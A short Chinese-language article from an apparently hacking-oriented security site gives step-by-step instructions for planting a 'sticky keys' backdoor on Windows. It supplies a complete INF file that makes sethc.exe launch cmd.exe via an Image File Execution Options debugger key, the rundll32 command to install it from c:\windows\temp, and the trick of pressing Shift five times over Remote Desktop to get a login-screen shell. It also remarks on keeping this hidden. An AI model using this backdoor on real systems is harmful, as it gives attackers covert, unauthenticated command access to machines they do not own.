热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

利用inf文件添加shift后门

发布时间:2012-01-30 11:11文章来源:网络文章作者:秩名 点击次数:
摘要:[Version] Signature=$WINDOWS NT$ [DefaultInstall] AddReg=My_AddReg_Name [My_AddReg_Name] HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe,debugger,0x00000000,c:\\windows\\system32\\cmd.exe 然后上传到...

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name

[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe,debugger,0x00000000,c:\\windows\\system32\\cmd.exe


然后上传到一个可以执行目录,比如我这里上传到c:\windows\temp\i.inf 然后在命令行执行

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\windows\temp\i.inf


然后远程登录3389,按5下shift即可跳出cmd.exe


为什么要命令行?隐蔽性?大家自行掂量

标签分类:

上一篇:Cain 嗅探丢包的解决办法
下一篇:linux内网渗透